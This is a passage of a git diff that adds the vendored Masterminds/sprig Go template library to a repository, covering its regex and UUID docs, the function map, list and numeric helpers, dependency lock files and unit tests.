+Returns true if the input string matches the regular expression.
+
+```
+regexMatch "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}" "test@acme.com"
+```
+
+The above produces `true`
+
+## regexFindAll
+
+Returns a slice of all matches of the regular expression in the input string.
+The last parameter `n` limits the number of matches returned; `-1` means all.
+
+```
+regexFindAll "[2,4,6,8]" "123456789" -1
+```
+
+The above produces `[2 4 6 8]`
+
+## regexFind
+
+Return the first (left-most) match of the regular expression in the input string.
+
+```
+regexFind "[a-zA-Z][1-9]" "abcd1234"
+```
+
+The above produces `d1`
+
+## regexReplaceAll
+
+Returns a copy of the input string, replacing matches of the regexp with the
+replacement string. Inside the replacement string, `$` signs are interpreted as
+in `Expand`; for instance, `$1` represents the text of the first submatch.
+
+```
+regexReplaceAll "a(x*)b" "-ab-axxb-" "${1}W"
+```
+
+The above produces `-W-xxW-`
+
+## regexReplaceAllLiteral
+
+Returns a copy of the input string, replacing matches of the regexp with the
+replacement string. The replacement string is substituted directly, without
+using `Expand`.
+
+```
+regexReplaceAllLiteral "a(x*)b" "-ab-axxb-" "${1}"
+```
+
+The above produces `-${1}-${1}-`
+
+## regexSplit
+
+Slices the input string into substrings separated by the expression and returns
+a slice of the substrings between those expression matches. The last parameter
+`n` determines the number of substrings to return, where `-1` means return all
+matches.
+
+```
+regexSplit "z+" "pizza" -1
+```
+
+The above produces `[pi a]`
+
+## See Also...
+
+The [Conversion Functions](conversion.html) page contains functions for converting
+strings. The [String Slice Functions](string_slice.html) page contains functions
+for working with an array of strings.
+
diff --git a/vendor/github.com/Masterminds/sprig/docs/uuid.md b/vendor/github.com/Masterminds/sprig/docs/uuid.md
new file mode 100644
index 0000000000..1b57a330a9
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/uuid.md
@@ -0,0 +1,9 @@
+# UUID Functions
+
+Sprig can generate UUID v4 universally unique IDs.
+
+```
+uuidv4
+```
+
+The above returns a new UUID of the v4 (randomly generated) type.
diff --git a/vendor/github.com/Masterminds/sprig/example_test.go b/vendor/github.com/Masterminds/sprig/example_test.go
new file mode 100644
index 0000000000..2d7696bf9e
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/example_test.go
@@ -0,0 +1,25 @@
+package sprig
+
+import (
+ "fmt"
+ "os"
+ "text/template"
+)
+
+func Example() {
+ // Set up variables and template.
+ vars := map[string]interface{}{"Name": " John Jacob Jingleheimer Schmidt "}
+ tpl := `Hello {{.Name | trim | lower}}`
+
+ // Get the Sprig function map.
+ fmap := TxtFuncMap()
+ t := template.Must(template.New("test").Funcs(fmap).Parse(tpl))
+
+ err := t.Execute(os.Stdout, vars)
+ if err != nil {
+ fmt.Printf("Error during template execution: %s", err)
+ return
+ }
+ // Output:
+ // Hello john jacob jingleheimer schmidt
+}
diff --git a/vendor/github.com/Masterminds/sprig/flow_control_test.go b/vendor/github.com/Masterminds/sprig/flow_control_test.go
new file mode 100644
index 0000000000..d4e5ebf03f
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/flow_control_test.go
@@ -0,0 +1,16 @@
+package sprig
+
+import (
+ "fmt"
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+)
+
+func TestFail(t *testing.T) {
+ const msg = "This is an error!"
+ tpl := fmt.Sprintf(`{{fail "%s"}}`, msg)
+ _, err := runRaw(tpl, nil)
+ assert.Error(t, err)
+ assert.Contains(t, err.Error(), msg)
+}
diff --git a/vendor/github.com/Masterminds/sprig/functions.go b/vendor/github.com/Masterminds/sprig/functions.go
new file mode 100644
index 0000000000..f0d1bc12c1
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/functions.go
@@ -0,0 +1,281 @@
+package sprig
+
+import (
+ "errors"
+ "html/template"
+ "os"
+ "path"
+ "strconv"
+ "strings"
+ ttemplate "text/template"
+ "time"
+
+ util "github.com/aokoli/goutils"
+ "github.com/huandu/xstrings"
+)
+
+// Produce the function map.
+//
+// Use this to pass the functions into the template engine:
+//
+//	tpl := template.New("foo").Funcs(sprig.FuncMap())
+//
+func FuncMap() template.FuncMap {
+ return HtmlFuncMap()
+}
+
+// HermeticTxtFuncMap returns a 'text/template'.FuncMap with only repeatable functions.
+func HermeticTxtFuncMap() ttemplate.FuncMap {
+ r := TxtFuncMap()
+ for _, name := range nonhermeticFunctions {
+ delete(r, name)
+ }
+ return r
+}
+
+// HermeticHtmlFuncMap returns an 'html/template'.FuncMap with only repeatable functions.
+func HermeticHtmlFuncMap() template.FuncMap {
+ r := HtmlFuncMap()
+ for _, name := range nonhermeticFunctions {
+ delete(r, name)
+ }
+ return r
+}
+
+// TxtFuncMap returns a 'text/template'.FuncMap
+func TxtFuncMap() ttemplate.FuncMap {
+ return ttemplate.FuncMap(GenericFuncMap())
+}
+
+// HtmlFuncMap returns an 'html/template'.FuncMap
+func HtmlFuncMap() template.FuncMap {
+ return template.FuncMap(GenericFuncMap())
+}
+
+// GenericFuncMap returns a copy of the basic function map as a map[string]interface{}.
+func GenericFuncMap() map[string]interface{} {
+ gfm := make(map[string]interface{}, len(genericMap))
+ for k, v := range genericMap {
+ gfm[k] = v
+ }
+ return gfm
+}
+
+// These functions are not guaranteed to evaluate to the same result for a given
+// input, because they refer to the environment or global state.
+var nonhermeticFunctions = []string{
+ // Date functions
+ "date",
+ "date_in_zone",
+ "date_modify",
+ "now",
+ "htmlDate",
+ "htmlDateInZone",
+ "dateInZone",
+ "dateModify",
+
+ // Strings
+ "randAlphaNum",
+ "randAlpha",
+ "randAscii",
+ "randNumeric",
+ "uuidv4",
+
+ // OS
+ "env",
+ "expandenv",
+}
+
+var genericMap = map[string]interface{}{
+ "hello": func() string { return "Hello!" },
+
+ // Date functions
+ "date": date,
+ "date_in_zone": dateInZone,
+ "date_modify": dateModify,
+ "now": func() time.Time { return time.Now() },
+ "htmlDate": htmlDate,
+ "htmlDateInZone": htmlDateInZone,
+ "dateInZone": dateInZone,
+ "dateModify": dateModify,
+ "ago": dateAgo,
+ "toDate": toDate,
+
+ // Strings
+ "abbrev": abbrev,
+ "abbrevboth": abbrevboth,
+ "trunc": trunc,
+ "trim": strings.TrimSpace,
+ "upper": strings.ToUpper,
+ "lower": strings.ToLower,
+ "title": strings.Title,
+ "untitle": untitle,
+ "substr": substring,
+ // Switch order so that "foo" | repeat 5
+ "repeat": func(count int, str string) string { return strings.Repeat(str, count) },
+ // Deprecated: Use trimAll.
+ "trimall": func(a, b string) string { return strings.Trim(b, a) },
+ // Switch order so that "$foo" | trimall "$"
+ "trimAll": func(a, b string) string { return strings.Trim(b, a) },
+ "trimSuffix": func(a, b string) string { return strings.TrimSuffix(b, a) },
+ "trimPrefix": func(a, b string) string { return strings.TrimPrefix(b, a) },
+ "nospace": util.DeleteWhiteSpace,
+ "initials": initials,
+ "randAlphaNum": randAlphaNumeric,
+ "randAlpha": randAlpha,
+ "randAscii": randAscii,
+ "randNumeric": randNumeric,
+ "swapcase": util.SwapCase,
+ "shuffle": xstrings.Shuffle,
+ "snakecase": xstrings.ToSnakeCase,
+ "camelcase": xstrings.ToCamelCase,
+ "wrap": func(l int, s string) string { return util.Wrap(s, l) },
+ "wrapWith": func(l int, sep, str string) string { return util.WrapCustom(str, l, sep, true) },
+ // Switch order so that "foobar" | contains "foo"
+ "contains": func(substr string, str string) bool { return strings.Contains(str, substr) },
+ "hasPrefix": func(substr string, str string) bool { return strings.HasPrefix(str, substr) },
+ "hasSuffix": func(substr string, str string) bool { return strings.HasSuffix(str, substr) },
+ "quote": quote,
+ "squote": squote,
+ "cat": cat,
+ "indent": indent,
+ "nindent": nindent,
+ "replace": replace,
+ "plural": plural,
+ "sha1sum": sha1sum,
+ "sha256sum": sha256sum,
+ "toString": strval,
+
+ // Wrap Atoi to stop errors.
+ "atoi": func(a string) int { i, _ := strconv.Atoi(a); return i },
+ "int64": toInt64,
+ "int": toInt,
+ "float64": toFloat64,
+
+ //"gt": func(a, b int) bool {return a > b},
+ //"gte": func(a, b int) bool {return a >= b},
+ //"lt": func(a, b int) bool {return a < b},
+ //"lte": func(a, b int) bool {return a <= b},
+
+ // split "/" foo/bar returns map[int]string{0: foo, 1: bar}
+ "split": split,
+ "splitList": func(sep, orig string) []string { return strings.Split(orig, sep) },
+ "toStrings": strslice,
+
+ "until": until,
+ "untilStep": untilStep,
+
+ // VERY basic arithmetic.
+ "add1": func(i interface{}) int64 { return toInt64(i) + 1 },
+ "add": func(i ...interface{}) int64 {
+ var a int64 = 0
+ for _, b := range i {
+ a += toInt64(b)
+ }
+ return a
+ },
+ "sub": func(a, b interface{}) int64 { return toInt64(a) - toInt64(b) },
+ "div": func(a, b interface{}) int64 { return toInt64(a) / toInt64(b) },
+ "mod": func(a, b interface{}) int64 { return toInt64(a) % toInt64(b) },
+ "mul": func(a interface{}, v ...interface{}) int64 {
+ val := toInt64(a)
+ for _, b := range v {
+ val = val * toInt64(b)
+ }
+ return val
+ },
+ "biggest": max,
+ "max": max,
+ "min": min,
+ "ceil": ceil,
+ "floor": floor,
+ "round": round,
+
+ // string slices. Note that we reverse the order b/c that's better
+ // for template processing.
+ "join": join,
+ "sortAlpha": sortAlpha,
+
+ // Defaults
+ "default": dfault,
+ "empty": empty,
+ "coalesce": coalesce,
+ "compact": compact,
+ "toJson": toJson,
+ "toPrettyJson": toPrettyJson,
+ "ternary": ternary,
+
+ // Reflection
+ "typeOf": typeOf,
+ "typeIs": typeIs,
+ "typeIsLike": typeIsLike,
+ "kindOf": kindOf,
+ "kindIs": kindIs,
+
+ // OS:
+ "env": func(s string) string { return os.Getenv(s) },
+ "expandenv": func(s string) string { return os.ExpandEnv(s) },
+
+ // File Paths:
+ "base": path.Base,
+ "dir": path.Dir,
+ "clean": path.Clean,
+ "ext": path.Ext,
+ "isAbs": path.IsAbs,
+
+ // Encoding:
+ "b64enc": base64encode,
+ "b64dec": base64decode,
+ "b32enc": base32encode,
+ "b32dec": base32decode,
+
+ // Data Structures:
+ "tuple": list, // FIXME: with the addition of append/prepend these are no longer immutable.
+ "list": list,
+ "dict": dict,
+ "set": set,
+ "unset": unset,
+ "hasKey": hasKey,
+ "pluck": pluck,
+ "keys": keys,
+ "pick": pick,
+ "omit": omit,
+ "merge": merge,
+
+ "append": push, "push": push,
+ "prepend": prepend,
+ "first": first,
+ "rest": rest,
+ "last": last,
+ "initial": initial,
+ "reverse": reverse,
+ "uniq": uniq,
+ "without": without,
+ "has": has,
+
+ // Crypto:
+ "genPrivateKey": generatePrivateKey,
+ "derivePassword": derivePassword,
+ "buildCustomCert": buildCustomCertificate,
+ "genCA": generateCertificateAuthority,
+ "genSelfSignedCert": generateSelfSignedCertificate,
+ "genSignedCert": generateSignedCertificate,
+
+ // UUIDs:
+ "uuidv4": uuidv4,
+
+ // SemVer:
+ "semver": semver,
+ "semverCompare": semverCompare,
+
+ // Flow Control:
+ "fail": func(msg string) (string, error) { return "", errors.New(msg) },
+
+ // Regex
+ "regexMatch": regexMatch,
+ "regexFindAll": regexFindAll,
+ "regexFind": regexFind,
+ "regexReplaceAll": regexReplaceAll,
+ "regexReplaceAllLiteral": regexReplaceAllLiteral,
+ "regexSplit": regexSplit,
+}
diff --git a/vendor/github.com/Masterminds/sprig/functions_test.go b/vendor/github.com/Masterminds/sprig/functions_test.go
new file mode 100644
index 0000000000..edf88a3255
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/functions_test.go
@@ -0,0 +1,108 @@
+package sprig
+
+import (
+ "bytes"
+ "fmt"
+ "math/rand"
+ "os"
+ "testing"
+ "text/template"
+
+ "github.com/aokoli/goutils"
+ "github.com/stretchr/testify/assert"
+)
+
+func TestEnv(t *testing.T) {
+ os.Setenv("FOO", "bar")
+ tpl := `{{env "FOO"}}`
+ if err := runt(tpl, "bar"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestExpandEnv(t *testing.T) {
+ os.Setenv("FOO", "bar")
+ tpl := `{{expandenv "Hello $FOO"}}`
+ if err := runt(tpl, "Hello bar"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestBase(t *testing.T) {
+ assert.NoError(t, runt(`{{ base "foo/bar" }}`, "bar"))
+}
+
+func TestDir(t *testing.T) {
+ assert.NoError(t, runt(`{{ dir "foo/bar/baz" }}`, "foo/bar"))
+}
+
+func TestIsAbs(t *testing.T) {
+ assert.NoError(t, runt(`{{ isAbs "/foo" }}`, "true"))
+ assert.NoError(t, runt(`{{ isAbs "foo" }}`, "false"))
+}
+
+func TestClean(t *testing.T) {
+ assert.NoError(t, runt(`{{ clean "/foo/../foo/../bar" }}`, "/bar"))
+}
+
+func TestExt(t *testing.T) {
+ assert.NoError(t, runt(`{{ ext "/foo/bar/baz.txt" }}`, ".txt"))
+}
+
+func TestSnakeCase(t *testing.T) {
+ assert.NoError(t, runt(`{{ snakecase "FirstName" }}`, "first_name"))
+ assert.NoError(t, runt(`{{ snakecase "HTTPServer" }}`, "http_server"))
+ assert.NoError(t, runt(`{{ snakecase "NoHTTPS" }}`, "no_https"))
+ assert.NoError(t, runt(`{{ snakecase "GO_PATH" }}`, "go_path"))
+ assert.NoError(t, runt(`{{ snakecase "GO PATH" }}`, "go_path"))
+ assert.NoError(t, runt(`{{ snakecase "GO-PATH" }}`, "go_path"))
+}
+
+func TestCamelCase(t *testing.T) {
+ assert.NoError(t, runt(`{{ camelcase "http_server" }}`, "HttpServer"))
+ assert.NoError(t, runt(`{{ camelcase "_camel_case" }}`, "_CamelCase"))
+ assert.NoError(t, runt(`{{ camelcase "no_https" }}`, "NoHttps"))
+ assert.NoError(t, runt(`{{ camelcase "_complex__case_" }}`, "_Complex_Case_"))
+ assert.NoError(t, runt(`{{ camelcase "all" }}`, "All"))
+}
+
+func TestShuffle(t *testing.T) {
+ goutils.RANDOM = rand.New(rand.NewSource(1))
+ // Because we're using a random number generator, we need these to go in
+ // a predictable sequence:
+ assert.NoError(t, runt(`{{ shuffle "Hello World" }}`, "rldo HWlloe"))
+}
+
+// runt runs a template and checks that the output exactly matches the expected string.
+func runt(tpl, expect string) error {
+ return runtv(tpl, expect, map[string]string{})
+}
+
+// runtv takes a template, and expected return, and values for substitution.
+//
+// It runs the template and verifies that the output is an exact match.
+func runtv(tpl, expect string, vars interface{}) error {
+ fmap := TxtFuncMap()
+ t := template.Must(template.New("test").Funcs(fmap).Parse(tpl))
+ var b bytes.Buffer
+ err := t.Execute(&b, vars)
+ if err != nil {
+ return err
+ }
+ if expect != b.String() {
+ return fmt.Errorf("Expected '%s', got '%s'", expect, b.String())
+ }
+ return nil
+}
+
+// runRaw runs a template with the given variables and returns the result.
+func runRaw(tpl string, vars interface{}) (string, error) {
+ fmap := TxtFuncMap()
+ t := template.Must(template.New("test").Funcs(fmap).Parse(tpl))
+ var b bytes.Buffer
+ err := t.Execute(&b, vars)
+ if err != nil {
+ return "", err
+ }
+ return b.String(), nil
+}
diff --git a/vendor/github.com/Masterminds/sprig/glide.lock b/vendor/github.com/Masterminds/sprig/glide.lock
new file mode 100644
index 0000000000..34afeb9c37
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/glide.lock
@@ -0,0 +1,33 @@
+hash: 770b6a1132b743dadf6a0bb5fb8bf7083b1a5209f6d6c07826234ab2a97aade9
+updated: 2018-04-02T23:08:56.947456531+02:00
+imports:
+- name: github.com/aokoli/goutils
+ version: 9c37978a95bd5c709a15883b6242714ea6709e64
+- name: github.com/google/uuid
+ version: 064e2069ce9c359c118179501254f67d7d37ba24
+- name: github.com/huandu/xstrings
+ version: 3959339b333561bf62a38b424fd41517c2c90f40
+- name: github.com/imdario/mergo
+ version: 7fe0c75c13abdee74b09fcacef5ea1c6bba6a874
+- name: github.com/Masterminds/goutils
+ version: 3391d3790d23d03408670993e957e8f408993c34
+- name: github.com/Masterminds/semver
+ version: 59c29afe1a994eacb71c833025ca7acf874bb1da
+- name: github.com/stretchr/testify
+ version: e3a8ff8ce36581f87a15341206f205b1da467059
+ subpackages:
+ - assert
+- name: golang.org/x/crypto
+ version: d172538b2cfce0c13cee31e647d0367aa8cd2486
+ subpackages:
+ - pbkdf2
+ - scrypt
+testImports:
+- name: github.com/davecgh/go-spew
+ version: 5215b55f46b2b919f50a1df0eaa5886afe4e3b3d
+ subpackages:
+ - spew
+- name: github.com/pmezard/go-difflib
+ version: d8ed2627bdf02c080bf22230dbb337003b7aba2d
+ subpackages:
+ - difflib
diff --git a/vendor/github.com/Masterminds/sprig/glide.yaml b/vendor/github.com/Masterminds/sprig/glide.yaml
new file mode 100644
index 0000000000..772ba91344
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/glide.yaml
@@ -0,0 +1,15 @@
+package: github.com/Masterminds/sprig
+import:
+- package: github.com/Masterminds/goutils
+ version: ^1.0.0
+- package: github.com/google/uuid
+ version: ^0.2
+- package: golang.org/x/crypto
+ subpackages:
+ - scrypt
+- package: github.com/Masterminds/semver
+ version: v1.2.2
+- package: github.com/stretchr/testify
+- package: github.com/imdario/mergo
+ version: ~0.2.2
+- package: github.com/huandu/xstrings
diff --git a/vendor/github.com/Masterminds/sprig/list.go b/vendor/github.com/Masterminds/sprig/list.go
new file mode 100644
index 0000000000..1860549a94
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/list.go
@@ -0,0 +1,259 @@
+package sprig
+
+import (
+ "fmt"
+ "reflect"
+ "sort"
+)
+
+// Reflection is used in these functions so that slices and arrays of strings,
+// ints, and other types not implementing []interface{} can be worked with.
+// For example, this is useful if you need to work on the output of regexes.
+
+func list(v ...interface{}) []interface{} {
+ return v
+}
+
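+// push copies the given slice or array into a new []interface{} and appends v.
+// It panics when called on any other type.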
+func push(list interface{}, v interface{}) []interface{} {
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ nl := make([]interface{}, l)
+ for i := 0; i < l; i++ {
+ nl[i] = l2.Index(i).Interface()
+ }
+
+ return append(nl, v)
+
+ default:
+ panic(fmt.Sprintf("Cannot push on type %s", tp))
+ }
+}
+
+func prepend(list interface{}, v interface{}) []interface{} {
+ //return append([]interface{}{v}, list...)
+
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ nl := make([]interface{}, l)
+ for i := 0; i < l; i++ {
+ nl[i] = l2.Index(i).Interface()
+ }
+
+ return append([]interface{}{v}, nl...)
+
+ default:
+ panic(fmt.Sprintf("Cannot prepend on type %s", tp))
+ }
+}
+
+func last(list interface{}) interface{} {
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ if l == 0 {
+ return nil
+ }
+
+ return l2.Index(l - 1).Interface()
+ default:
+ panic(fmt.Sprintf("Cannot find last on type %s", tp))
+ }
+}
+
+func first(list interface{}) interface{} {
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ if l == 0 {
+ return nil
+ }
+
+ return l2.Index(0).Interface()
+ default:
+ panic(fmt.Sprintf("Cannot find first on type %s", tp))
+ }
+}
+
+func rest(list interface{}) []interface{} {
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ if l == 0 {
+ return nil
+ }
+
+ nl := make([]interface{}, l-1)
+ for i := 1; i < l; i++ {
+ nl[i-1] = l2.Index(i).Interface()
+ }
+
+ return nl
+ default:
+ panic(fmt.Sprintf("Cannot find rest on type %s", tp))
+ }
+}
+
+func initial(list interface{}) []interface{} {
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ if l == 0 {
+ return nil
+ }
+
+ nl := make([]interface{}, l-1)
+ for i := 0; i < l-1; i++ {
+ nl[i] = l2.Index(i).Interface()
+ }
+
+ return nl
+ default:
+ panic(fmt.Sprintf("Cannot find initial on type %s", tp))
+ }
+}
+
+func sortAlpha(list interface{}) []string {
+ k := reflect.Indirect(reflect.ValueOf(list)).Kind()
+ switch k {
+ case reflect.Slice, reflect.Array:
+ a := strslice(list)
+ s := sort.StringSlice(a)
+ s.Sort()
+ return s
+ }
+ return []string{strval(list)}
+}
+
+func reverse(v interface{}) []interface{} {
+ tp := reflect.TypeOf(v).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(v)
+
+ l := l2.Len()
+ // We do not sort in place because the incoming array should not be altered.
+ nl := make([]interface{}, l)
+ for i := 0; i < l; i++ {
+ nl[l-i-1] = l2.Index(i).Interface()
+ }
+
+ return nl
+ default:
+ panic(fmt.Sprintf("Cannot find reverse on type %s", tp))
+ }
+}
+
+func compact(list interface{}) []interface{} {
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ nl := []interface{}{}
+ var item interface{}
+ for i := 0; i < l; i++ {
+ item = l2.Index(i).Interface()
+ if !empty(item) {
+ nl = append(nl, item)
+ }
+ }
+
+ return nl
+ default:
+ panic(fmt.Sprintf("Cannot compact on type %s", tp))
+ }
+}
+
+func uniq(list interface{}) []interface{} {
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ dest := []interface{}{}
+ var item interface{}
+ for i := 0; i < l; i++ {
+ item = l2.Index(i).Interface()
+ if !inList(dest, item) {
+ dest = append(dest, item)
+ }
+ }
+
+ return dest
+ default:
+ panic(fmt.Sprintf("Cannot find uniq on type %s", tp))
+ }
+}
+
+func inList(haystack []interface{}, needle interface{}) bool {
+ for _, h := range haystack {
+ if reflect.DeepEqual(needle, h) {
+ return true
+ }
+ }
+ return false
+}
+
+func without(list interface{}, omit ...interface{}) []interface{} {
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ res := []interface{}{}
+ var item interface{}
+ for i := 0; i < l; i++ {
+ item = l2.Index(i).Interface()
+ if !inList(omit, item) {
+ res = append(res, item)
+ }
+ }
+
+ return res
+ default:
+ panic(fmt.Sprintf("Cannot find without on type %s", tp))
+ }
+}
+
+func has(needle interface{}, haystack interface{}) bool {
+ tp := reflect.TypeOf(haystack).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(haystack)
+ var item interface{}
+ l := l2.Len()
+ for i := 0; i < l; i++ {
+ item = l2.Index(i).Interface()
+ if reflect.DeepEqual(needle, item) {
+ return true
+ }
+ }
+
+ return false
+ default:
+ panic(fmt.Sprintf("Cannot find has on type %s", tp))
+ }
+}
diff --git a/vendor/github.com/Masterminds/sprig/list_test.go b/vendor/github.com/Masterminds/sprig/list_test.go
new file mode 100644
index 0000000000..fa4cc76e57
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/list_test.go
@@ -0,0 +1,157 @@
+package sprig
+
+import (
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+)
+
+func TestTuple(t *testing.T) {
+ tpl := `{{$t := tuple 1 "a" "foo"}}{{index $t 2}}{{index $t 0 }}{{index $t 1}}`
+ if err := runt(tpl, "foo1a"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestList(t *testing.T) {
+ tpl := `{{$t := list 1 "a" "foo"}}{{index $t 2}}{{index $t 0 }}{{index $t 1}}`
+ if err := runt(tpl, "foo1a"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestPush(t *testing.T) {
+ // Named `append` in the function map
+ tests := map[string]string{
+ `{{ $t := tuple 1 2 3 }}{{ append $t 4 | len }}`: "4",
+ `{{ $t := tuple 1 2 3 4 }}{{ append $t 5 | join "-" }}`: "1-2-3-4-5",
+ `{{ $t := regexSplit "/" "foo/bar/baz" -1 }}{{ append $t "qux" | join "-" }}`: "foo-bar-baz-qux",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+func TestPrepend(t *testing.T) {
+ tests := map[string]string{
+ `{{ $t := tuple 1 2 3 }}{{ prepend $t 0 | len }}`: "4",
+ `{{ $t := tuple 1 2 3 4 }}{{ prepend $t 0 | join "-" }}`: "0-1-2-3-4",
+ `{{ $t := regexSplit "/" "foo/bar/baz" -1 }}{{ prepend $t "qux" | join "-" }}`: "qux-foo-bar-baz",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestFirst(t *testing.T) {
+ tests := map[string]string{
+ `{{ list 1 2 3 | first }}`: "1",
+ `{{ list | first }}`: "",
+ `{{ regexSplit "/src/" "foo/src/bar" -1 | first }}`: "foo",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+func TestLast(t *testing.T) {
+ tests := map[string]string{
+ `{{ list 1 2 3 | last }}`: "3",
+ `{{ list | last }}`: "",
+ `{{ regexSplit "/src/" "foo/src/bar" -1 | last }}`: "bar",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestInitial(t *testing.T) {
+ tests := map[string]string{
+ `{{ list 1 2 3 | initial | len }}`: "2",
+ `{{ list 1 2 3 | initial | last }}`: "2",
+ `{{ list 1 2 3 | initial | first }}`: "1",
+ `{{ list | initial }}`: "[]",
+ `{{ regexSplit "/" "foo/bar/baz" -1 | initial }}`: "[foo bar]",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestRest(t *testing.T) {
+ tests := map[string]string{
+ `{{ list 1 2 3 | rest | len }}`: "2",
+ `{{ list 1 2 3 | rest | last }}`: "3",
+ `{{ list 1 2 3 | rest | first }}`: "2",
+ `{{ list | rest }}`: "[]",
+ `{{ regexSplit "/" "foo/bar/baz" -1 | rest }}`: "[bar baz]",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestReverse(t *testing.T) {
+ tests := map[string]string{
+ `{{ list 1 2 3 | reverse | first }}`: "3",
+ `{{ list 1 2 3 | reverse | rest | first }}`: "2",
+ `{{ list 1 2 3 | reverse | last }}`: "1",
+ `{{ list 1 2 3 4 | reverse }}`: "[4 3 2 1]",
+ `{{ list 1 | reverse }}`: "[1]",
+ `{{ list | reverse }}`: "[]",
+ `{{ regexSplit "/" "foo/bar/baz" -1 | reverse }}`: "[baz bar foo]",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestCompact(t *testing.T) {
+ tests := map[string]string{
+ `{{ list 1 0 "" "hello" | compact }}`: `[1 hello]`,
+ `{{ list "" "" | compact }}`: `[]`,
+ `{{ list | compact }}`: `[]`,
+ `{{ regexSplit "/" "foo//bar" -1 | compact }}`: "[foo bar]",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestUniq(t *testing.T) {
+ tests := map[string]string{
+ `{{ list 1 2 3 4 | uniq }}`: `[1 2 3 4]`,
+ `{{ list "a" "b" "c" "d" | uniq }}`: `[a b c d]`,
+ `{{ list 1 1 1 1 2 2 2 2 | uniq }}`: `[1 2]`,
+ `{{ list "foo" 1 1 1 1 "foo" "foo" | uniq }}`: `[foo 1]`,
+ `{{ list | uniq }}`: `[]`,
+ `{{ regexSplit "/" "foo/foo/bar" -1 | uniq }}`: "[foo bar]",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestWithout(t *testing.T) {
+ tests := map[string]string{
+ `{{ without (list 1 2 3 4) 1 }}`: `[2 3 4]`,
+ `{{ without (list "a" "b" "c" "d") "a" }}`: `[b c d]`,
+ `{{ without (list 1 1 1 1 2) 1 }}`: `[2]`,
+ `{{ without (list) 1 }}`: `[]`,
+ `{{ without (list 1 2 3) }}`: `[1 2 3]`,
+ `{{ without list }}`: `[]`,
+ `{{ without (regexSplit "/" "foo/bar/baz" -1 ) "foo" }}`: "[bar baz]",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestHas(t *testing.T) {
+ tests := map[string]string{
+ `{{ list 1 2 3 | has 1 }}`: `true`,
+ `{{ list 1 2 3 | has 4 }}`: `false`,
+ `{{ regexSplit "/" "foo/bar/baz" -1 | has "bar" }}`: `true`,
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
diff --git a/vendor/github.com/Masterminds/sprig/numeric.go b/vendor/github.com/Masterminds/sprig/numeric.go
new file mode 100644
index 0000000000..209c62e53a
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/numeric.go
@@ -0,0 +1,159 @@
+package sprig
+
+import (
+ "math"
+ "reflect"
+ "strconv"
+)
+
+// toFloat64 converts the given value to a float64, returning 0 when it cannot.
+func toFloat64(v interface{}) float64 {
+ if str, ok := v.(string); ok {
+ iv, err := strconv.ParseFloat(str, 64)
+ if err != nil {
+ return 0
+ }
+ return iv
+ }
+
+ val := reflect.Indirect(reflect.ValueOf(v))
+ switch val.Kind() {
+ case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+ return float64(val.Int())
+ case reflect.Uint8, reflect.Uint16, reflect.Uint32:
+ return float64(val.Uint())
